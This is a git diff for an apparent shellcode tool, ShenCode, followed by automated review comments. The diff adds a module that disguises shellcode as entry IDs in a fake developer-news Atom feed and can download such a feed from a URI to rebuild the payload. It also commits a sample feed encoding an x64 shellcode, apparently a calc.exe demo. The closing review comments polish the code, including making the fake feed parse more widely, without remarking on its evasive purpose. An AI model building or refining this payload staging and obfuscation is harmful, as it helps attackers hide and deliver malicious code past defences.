diff --git a/README.md b/README.md index 5076373..28d8147 100644 --- a/README.md +++ b/README.md 
@@ -2,26 +2,27 @@ **A versatile tool for working with shellcodes.** -![](shencode-060.png) +![|800](shencode-061.png) ## Features -### Version 0.6.0 +### Version 0.6.1 - general - - `extract` - [extract](https://github.com/psycore8/shencode/wiki/extract) from/to offset - - `formatout` - [display raw shellcodes](https://github.com/psycore8/shencode/wiki/formatout) in `C++, C#` and more - - `inject` - [inject shellcode](https://github.com/psycore8/shencode/wiki/inject) into process (Windows only) - - `msfvenom` - [create payloads](https://github.com/psycore8/shencode/wiki/msfvenom) with msfvenom + - `extract` - [extract](https://www.heckhausen.it/shencode/wiki/extract) from/to offset + - `formatout` - [display raw shellcodes](https://www.heckhausen.it/shencode/wiki/formatout) in `C++, C#` and more + - `inject` - [inject shellcode](https://www.heckhausen.it/shencode/wiki/inject) into process (Windows only) + - `msfvenom` - [create payloads](https://www.heckhausen.it/shencode/wiki/msfvenom) with msfvenom - encoder - - `aesenc` - [Encrypt](https://github.com/psycore8/shencode/wiki/aesenc) payload with AES - - `byteswap` - New XOR Encryption, [Swapping Bytes](https://github.com/psycore8/shencode/wiki/byteswap) ([Blog Post](https://www.nosociety.de/en:it-security:blog:obfuscation_byteswapping)) - - `xorenc` - [Encode payload](https://github.com/psycore8/shencode/wiki/xorenc) with custom XOR key - - `xorpoly` - [polymorphic x64](https://github.com/psycore8/shencode/wiki/xorpoly) in-memory decoder (for details, visit this [Blog Post](https://www.nosociety.de/en:it-security:blog:obfuscation_polymorphic_in_memory_decoder)) + - `aesenc` - [Encrypt](https://www.heckhausen.it/shencode/wiki/aesenc) payload with AES + - `byteswap` - New XOR Encryption, [Swapping Bytes](https://www.heckhausen.it/shencode/wiki/byteswap) ([Blog Post](https://www.nosociety.de/en:it-security:blog:obfuscation_byteswapping)) + - `xorenc` - [Encode payload](https://www.heckhausen.it/shencode/wiki/xorenc) 
with custom XOR key + - `xorpoly` - [polymorphic x64](https://www.heckhausen.it/shencode/wiki/xorpoly) in-memory decoder (for details, visit this [Blog Post](https://www.nosociety.de/en:it-security:blog:obfuscation_polymorphic_in_memory_decoder)) - obfuscator - - `QR-Code` hide OpCodes as [QR-Code image](https://github.com/psycore8/shencode/wiki/qrcode) - - `ROR13` to `ROL` [conversion with custom key](https://github.com/psycore8/shencode/wiki/ror2rol) (Windows only) - - `UUID` [obfuscation](https://github.com/psycore8/shencode/wiki/uuid) - Please, check out my [Blog Post](https://www.nosociety.de/en:it-security:blog:obfuscation_shellcode_als_uuids_tarnen_-_teil_1) about this encoder + - `Feed` - Splits Bytes in a [feed.xml file](https://www.heckhausen.it/shencode/wiki/feed) as article IDs + - `QR-Code` hide OpCodes as [QR-Code image](https://www.heckhausen.it/shencode/wiki/qrcode) + - `ROR13` to `ROL` [conversion with custom key](https://www.heckhausen.it/shencode/wiki/ror2rol) (Windows only) + - `UUID` [obfuscation](https://www.heckhausen.it/shencode/wiki/uuid) - Please, check out my [Blog Post](https://www.nosociety.de/en:it-security:blog:obfuscation_shellcode_als_uuids_tarnen_-_teil_1) about this encoder ## How to use 
@@ -29,21 +30,9 @@ Check out the [ShenCode Docs](https://heckhausen.it/shencode/wiki/) for more inf ## Release Notes -#### Improvements - -- `byteswap` - New XOR Encryption, Swapping Bytes -- `core` - Tested on Linux and Windows -- `core` - Output optimizations -- `core` - Better class implementations -- `core` - Fixed Linux import error -- `formatout` - Missing comma at EOL of C# output -- `formatout` - `--no-break` disable line break in output -- `extract` - Replaced `--first-byte` with `--start-offset` argument -- `extract` - Replaced `--last-byte` with `--end-offset` argument -- `extract` - Short arguments are `-so / -eo` -- `qrcode` - Fixed non functional implementation -- `xorpoly` - Code optimizations -- +- `feed` - A new obfuscation module +- `core` - added some different logos for startup + ## References - [Byte-Swapping](https://www.nosociety.de/en:it-security:blog:obfuscation_byteswapping) diff --git a/_dev.bat b/_dev.bat index b4bb3fc..f43aa1e 100644 --- a/_dev.bat +++ b/_dev.bat @@ -9,5 +9,5 @@ rem doskey shen-ror=python3.12 shencode.py ror2rol $* rem doskey shen-uid=python3.12 shencode.py uuid $* rem doskey shen-xop=python3.12 shencode.py xorpoly $* rem doskey shen-xoe=python3.12 shencode.py xorenc $* -doskey shc=python3.12 shencode.py $* +doskey shc=python shencode.py $* doskey /MACROS \ No newline at end of file diff --git a/feedtest.x b/feedtest.x new file mode 100644 index 0000000..81b2876 --- /dev/null +++ b/feedtest.x 
@@ -0,0 +1,235 @@ + + + + 2024-12-22 12:15:03.104716 + https://www.microloft.com/feed.xml + Developer News + The latest developer news from microloft.com + + Bill Ports + + + Title 1 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/554889e54883ec40 + + + Title 2 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/4831c0488945f848 + + + Title 3 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/8945f0488945e848 + + + Title 4 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/8945e0488945d848 + + + Title 5 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/8945d0488945c850 + + + Title 6 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/48b857696e457865 + + + Title 7 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/631148c1e00848c1 + + + Title 8 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/e80850488965d848 + + + Title 9 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/31c065488b406048 + + + Title 10 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/8b4018488b402048 + + + Title 11 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/8b18488b03488b40 + + + Title 12 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/204889c34831c98b + + + Title 13 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/433c4801d84831c9 + + + Title 14 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/80c1888b04084801 + + + Title 15 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/d88b481448894df8 + + + Title 16 + + 2024-12-22 
12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/8b481c4801d94889 + + + Title 17 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/4df08b48204801d9 + + + Title 18 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/48894de88b482448 + + + Title 19 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/01d948894de04831 + + + Title 20 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/c04831c9488b75d8 + + + Title 21 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/488b7de8fc8b3c87 + + + Title 22 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/4801dfb108f3a674 + + + Title 23 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/0948ffc0483b45f8 + + + Title 24 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/75e2488b4de0488b + + + Title 25 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/55f0668b04418b04 + + + Title 26 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/824801d84831d248 + + + Title 27 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/31c95148b963616c + + + Title 28 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/632e657865514889 + + + Title 29 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/e1b2014883e4f048 + + + Title 30 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/83ec20ffd04883c4 + + + Title 31 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/384883c4184883c4 + + + Title 32 + + 2024-12-22 12:15:03.104716 + 2024-12-22 12:15:03.104716 + https://www.microloft.com/085dc3 
+ + diff --git a/obfuscator/feed.py b/obfuscator/feed.py new file mode 100644 index 0000000..4b1f7b4 --- /dev/null +++ b/obfuscator/feed.py 
@@ -0,0 +1,99 @@ +import utils.arg +import datetime +import feedparser +from lxml import etree + +class feed_obfuscator: + Author = 'psycore8' + Description = 'obfuscate shellcodes as XML Feed' + Version = '1.0.0' + feed_fake_uri = 'https://www.microloft.com/' + feed_fake_title = 'Developer News' + feed_fake_subtitle = 'The latest developer news from microloft.com' + feed_fake_author = 'Bill Ports' + feed_fake_ids = [] + shellcode = '' + + def __init__(self, input_file, output_file, uri): + self.input_file = input_file + self.output_file = output_file + self.uri = uri + + + def init(): + spName = 'feed' + spArgList = [ + ['-i', '--input', '', '', 'Input file for feed obfucsation'], + ['-o', '--output', '', '', 'Output file for feed obfucsation'], + ['-r', '--reassemble', '', 'store_true', 'Reassemble fake feed to Shellcode'], + ['-u', '--uri', '', '', 'URI to fake feed'] + ] + utils.arg.CreateSubParser(spName, feed_obfuscator.Description, spArgList) + + def open_file(self): + try: + for b in open(self.input_file, 'rb').read(): + self.shellcode += b.to_bytes(1, 'big').hex() + return True + except FileNotFoundError: + return False + + def convert_bytes_to_fake_id(self, block_size=16): + s = self.shellcode.encode('utf-8') + self.feed_fake_ids.extend([s[i:i + block_size] for i in range(0, len(s), block_size)]) + #print(f'{self.feed_fake_ids}') + + + def generate_feed(self): + date_time = datetime.datetime.now() + root = etree.Element('feed') + + # Header + feed_link = etree.SubElement(root, 'link', attrib= + { + 'href': f'{self.feed_fake_uri}feed.xml', + 'rel': 'self', + 'type': 'application/atom+xml' + }) + feed_updated = etree.SubElement(root, 'updated') + feed_updated.text = f'{date_time}' + feed_id = etree.SubElement(root, 'id') + feed_id.text = f'{self.feed_fake_uri}feed.xml' + feed_title = etree.SubElement(root, 'title', attrib={'type': 'html'}) + feed_title.text = f'{self.feed_fake_title}' + feed_subtitle = etree.SubElement(root, 'subtitle') + feed_subtitle.text 
= f'{self.feed_fake_subtitle}' + feed_author = etree.SubElement(root, 'author') + feed_author_name = etree.SubElement(feed_author, 'name') + feed_author_name.text = f'{self.feed_fake_author}' + + # Entries + i = 1 + for id in self.feed_fake_ids: + entry = etree.SubElement(root, 'entry') + entry_title = etree.SubElement(entry, 'title', attrib={'type': 'html'}) + entry_title.text = f'Title {i}' + entry_link = etree.SubElement(entry, 'link', attrib={'href': f'{self.feed_fake_uri}0{i}/02/title{i}', 'rel': 'alternate', 'type': 'text/html', 'title': 'Title 1'}) + entry_published = etree.SubElement(entry, 'published') + entry_published.text = f'{date_time}' + entry_updated = etree.SubElement(entry, 'updated') + entry_updated.text = f'{date_time}' + entry_id = etree.SubElement(entry, 'id') + entry_id.text = f'{self.feed_fake_uri}{id.decode('utf-8')}' # 16 bytes part of shellcode + i += 1 + + xml_str = etree.tostring(root, pretty_print=True, xml_declaration=True, encoding="utf-8") + with open(self.output_file, "wb") as file: + file.write(xml_str) + + def reassemble_shellcode(self): + feed = feedparser.parse(self.uri) + for entry in feed.entries: + pos = entry.id.rfind('/') + self.shellcode += entry.id[pos + 1:] + #print(self.shellcode) + out_shellcode = bytes.fromhex(self.shellcode) + with open(self.output_file, 'wb') as file: + file.write(out_shellcode) + + diff --git a/requirements.txt b/requirements.txt index 08cfa18..00eb581 100644 Binary files a/requirements.txt and b/requirements.txt differ diff --git a/shencode-061.png b/shencode-061.png new file mode 100644 index 0000000..93ad53a Binary files /dev/null and b/shencode-061.png differ diff --git a/shencode.py b/shencode.py index 41bcae2..d3aff9e 100644 --- a/shencode.py +++ b/shencode.py @@ -6,6 +6,7 @@ import utils.extract as extract import utils.formatout as formatout import utils.hashes as hashes +import utils.header if os.name == 'nt': import utils.injection as injection import utils.msf as msf 
@@ -13,11 +14,12 @@ import encoder.byteswap as byteswap import encoder.xorpoly as xorpoly import encoder.xor as xor +import obfuscator.feed as feed import obfuscator.qrcode as qrcode import obfuscator.rolhash as rolhash import obfuscator.uuid as uuid -Version = '0.6.0' +Version = '0.6.1' # make sure your metasploit binary folder is in your PATH variable if os.name == 'nt': @@ -29,15 +31,9 @@ def main(command_line=None): print(f"{nstate.HEADER}") - print(f" _______ __ _______ __ ") - print(f" | _ | | |--. .-----. .-----. | _ | .-----. .--| | .-----.") - print(f" | 1___| | | | -__| | | |. 1___| | _ | | _ | | -__|") - print(f" |____ | |__|__| |_____| |__|__| |. |___ |_____| |_____| |_____|") - print(f" |: 1 | |: 1 | ") - print(f" |::.. . | |::.. . | ") - print(f" `-------\' `-------\' ") + print(f'{utils.header.get_header()}') print(f'Version {Version} by psycore8 -{nstate.ENDC} {nstate.TextLink('https://www.nosociety.de')}') - #print(f"Version {Version} by psycore8 -{nstate.ENDC} {nstate.LINK}https://www.nosociety.de{nstate.ENDC}") + ########################## ### BEGIN INIT SECTION ### @@ -51,6 +47,7 @@ def main(command_line=None): if os.name == 'nt': injection.inject.init() msf.msfvenom.init() + feed.feed_obfuscator.init() qrcode.qrcode_obfuscator.init() if os.name == 'nt': rolhash.ror2rol_obfuscator.init() 
@@ -143,6 +140,28 @@ def main(command_line=None): print(f"{nstate.OKBLUE} try to generate UUIDs") print(uuid_obf.CreateVar()) + elif arguments.command == 'feed': + feed_obf = feed.feed_obfuscator(arguments.input, arguments.output, arguments.uri) + + if feed_obf.uri: + feed_obf.reassemble_shellcode() + filecheck, outstrings = FileCheck.CheckSourceFile(feed_obf.output_file, 'OBF-RSS') + for string in outstrings: + print(string) + exit() + filecheck, outstrings = FileCheck.CheckSourceFile(feed_obf.input_file, 'OBF-RSS') + for string in outstrings: + print(string) + if filecheck: + feed_obf.open_file() + feed_obf.convert_bytes_to_fake_id() + feed_obf.generate_feed() + else: + exit() + filecheck, outstrings = FileCheck.CheckSourceFile(feed_obf.output_file, 'OBF-RSS') + for string in outstrings: + print(string) + elif arguments.command == 'qrcode': qr = qrcode.qrcode_obfuscator(arguments.input, arguments.output, '') filecheck, outstrings = FileCheck.CheckSourceFile(qr.input_file, 'OBF-QRC') diff --git a/utils/header.py b/utils/header.py new file mode 100644 index 0000000..14141c2 --- /dev/null +++ b/utils/header.py 
@@ -0,0 +1,62 @@ +import random + +header1 = """ + _______ __ _______ __ + | _ | | |--. .-----. .-----. | _ | .-----. .--| | .-----. + | 1___| | | | -__| | | |. 1___| | _ | | _ | | -__| + |____ | |__|__| |_____| |__|__| |. |___ |_____| |_____| |_____| + |: 1 | |: 1 | + |::.. . | |::.. . | + `-------\' `-------\' + """ + +header2 = """ + .dMMMb dMP dMP dMMMMMP dMMMMb .aMMMb .aMMMb dMMMMb dMMMMMP + dMP" VP dMP dMP dMP dMP dMP dMP"VMP dMP"dMP dMP VMP dMP + VMMMb dMMMMMP dMMMP dMP dMP dMP dMP dMP dMP dMP dMMMP +dP .dMP dMP dMP dMP dMP dMP dMP.aMP dMP.aMP dMP.aMP dMP +VMMMP" dMP dMP dMMMMMP dMP dMP VMMMP" VMMMP" dMMMMP" dMMMMMP +""" + +header3 = """ + .d8888b. 888 .d8888b. 888 +d88P Y88b 888 d88P Y88b 888 +Y88b. 888 888 888 888 + "Y888b. 88888b. .d88b. 88888b. 888 .d88b. .d88888 .d88b. + "Y88b. 888 "88b d8P Y8b 888 "88b 888 d88""88b d88" 888 d8P Y8b + "888 888 888 88888888 888 888 888 888 888 888 888 888 88888888 +Y88b d88P 888 888 Y8b. 888 888 Y88b d88P Y88..88P Y88b 888 Y8b. + "Y8888P" 888 888 "Y8888 888 888 "Y8888P" "Y88P" "Y88888 "Y8888 +""" + +header4 = """ + :::=== ::: === :::===== :::= === :::===== :::==== :::==== :::===== + ::: ::: === ::: :::===== ::: ::: === ::: === ::: + ===== ======== ====== ======== === === === === === ====== + === === === === === ==== === === === === === === + ====== === === ======== === === ======= ====== ======= ======== +""" + +header5 = """ + + ____ ___ ______ _______ ____ ________ ____ ______ +/ ___| |_ ||____ ||. __ | / ___||. ___ | |__ | |____ | +\\___ \\ |_| _ | | | | | || | | | | | | | _ | | + ___) | | | |_| | | _| || |___ | |___| | ____| | | | |_| +|____/ | | |_||___| \\____| |_______|/____/\\_\\ | | + |_| |_| +""" + +def get_header(): + rnd = random.randint(1, 5) + # print(f'{rnd}') + if rnd == 1: + return header1 + elif rnd == 2: + return header2 + elif rnd == 3: + return header3 + elif rnd == 4: + return header4 + elif rnd == 5: + return header5 \ No newline at end of file 
diff --git a/utils/msf.py b/utils/msf.py index 5525fa2..51eb043 100644 --- a/utils/msf.py +++ b/utils/msf.py @@ -3,9 +3,9 @@ class msfvenom: - Author = 'psycore8' - Description = 'Generate payloads with metasploit' - Version = '1.1.0' + Author = 'psycore8' + Description = 'Generate payloads with metasploit' + Version = '1.1.0' def __init__(self, command_line): self.command_line = command_line
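Review bot: In the README hunk, `![|800](shencode-061.png)` is Obsidian's image-width syntax; GitHub-flavoured Markdown renders it as an image whose alt text is the literal string `|800`. Use `<img src="shencode-061.png" width="800">` if the fixed width matters, or a plain `![ShenCode 0.6.1](shencode-061.png)`. The same hunk also deletes the entire 0.6.0 "Improvements" list from Release Notes; if the README is the project's only changelog, keep the previous version's entries under their own version heading instead of overwriting them, so users upgrading across two releases can still see the `--start-offset` / `--end-offset` renames.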
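Review bot: The `_dev.bat` hunk drops the interpreter pin (`python3.12` to `python`) only for the active `shc` macro while the commented-out macros above it still use `python3.12`, and the new `obfuscator/feed.py` uses a same-quote nested f-string (`f'{self.feed_fake_uri}{id.decode('utf-8')}'`) that is a SyntaxError before Python 3.12. Either keep the pin here and document the 3.12 minimum in the README, or rewrite that f-string with double quotes inside so the tool still runs on older interpreters.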
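Review bot: `feedtest.x` commits a generated output file rather than a fixture: its entry IDs carry a hex byte sequence split into 16-character chunks (`554889e54883ec40`, ...), its timestamps are Python's `str(datetime)` form (`2024-12-22 12:15:03.104716`) instead of the RFC 3339 form Atom requires, and the `.x` extension does not match the `feed.xml` name the README entry for `Feed` describes. If it is meant as a regression sample, generate it from a clearly inert byte string (e.g. an incrementing byte pattern), name it `feed.xml` or `test/feed.xml`, and state in the README or wiki what test consumes it; otherwise leave generated output out of the repository.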
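Review bot: In `obfuscator/feed.py`, `feed_fake_ids = []` and `shellcode = ''` are class attributes, and `convert_bytes_to_fake_id` mutates the shared list via `self.feed_fake_ids.extend(...)`, so a second instance in the same process (or calling the method twice) appends to the previous run's chunks; move both into `__init__` as `self.feed_fake_ids = []` and `self.shellcode = ''`. Further points in the same hunk: the comment `# 16 bytes part of shellcode` is wrong, each chunk is 16 hex characters, i.e. 8 bytes; the entry link hard-codes `'title': 'Title 1'` where the other fields use `f'Title {i}'`; `etree.Element('feed')` has no Atom namespace (`nsmap={None: 'http://www.w3.org/2005/Atom'}`) and `f'{date_time}'` is not RFC 3339 (`datetime.datetime.now(datetime.timezone.utc).isoformat(timespec='seconds')` is), so only lenient parsers such as feedparser will accept the output; `open_file` never closes its handle and assembles the hex string one byte at a time when `with open(self.input_file, 'rb') as f: self.shellcode = f.read().hex()` does the same; `reassemble_shellcode` silently writes an empty file when `feedparser.parse` returns no entries, so check `feed.bozo` / `len(feed.entries)` and use `entry.get('id')` rather than `entry.id` before writing; `id` shadows the builtin; and the help strings read `obfucsation` twice (`obfuscation`).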
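Review bot: In the `shencode.py` hunk at `@@ -29,15 +31,9 @@`, `print(f'{utils.header.get_header()}')` wraps a string that is already a string; `print(utils.header.get_header())` is the idiomatic form. Removing the commented-out `#print(...)` line is fine.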
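Review bot: In the `shencode.py` hunk at `@@ -143,6 +140,28 @@`, the `feed` branch decides between build and reassemble on `if feed_obf.uri:` and never reads the `-r/--reassemble` flag that `feed_obfuscator.init()` registers; either drop the flag or dispatch on it and treat a missing `--uri` as a usage error. In the reassemble path `arguments.output` is not validated, so `-u` without `-o` ends in `open(None, 'wb')` raising `TypeError` inside `reassemble_shellcode`; the return value of `feed_obf.open_file()` is ignored although the method returns `False` on `FileNotFoundError`; and the bare `exit()` calls are the `site` convenience builtin, so use `sys.exit()` or `return` as the other branches should.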
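Review bot: In `utils/header.py`, `get_header` picks a banner with `random.randint(1, 5)` and a five-way `if/elif` chain that returns `None` implicitly if a header is ever added without extending the chain; `return random.choice((header1, header2, header3, header4, header5))` is shorter and cannot fall through. The `\'` escapes inside the triple-quoted `header1` are unnecessary (a plain `'` is fine there), and the file lacks a trailing newline.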
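Review bot: `requirements.txt` shows up as `Binary files ... differ`, so the dependency change cannot be reviewed; this usually means the file was saved in a UTF-16 encoding (an assumption, typically from a PowerShell redirect). `obfuscator/feed.py` imports `feedparser` and `lxml`, so this hunk presumably adds them; re-save the file as UTF-8 without BOM so the added pins are visible in the diff and in future reviews.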
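Review bot: The `utils/msf.py` hunk is a whitespace-only re-indentation of three class attributes with no functional change; if it corrects mixed indentation, run the formatter over the whole file in a separate commit rather than touching three lines inside a feature change, so `git blame` on the feed work stays clean.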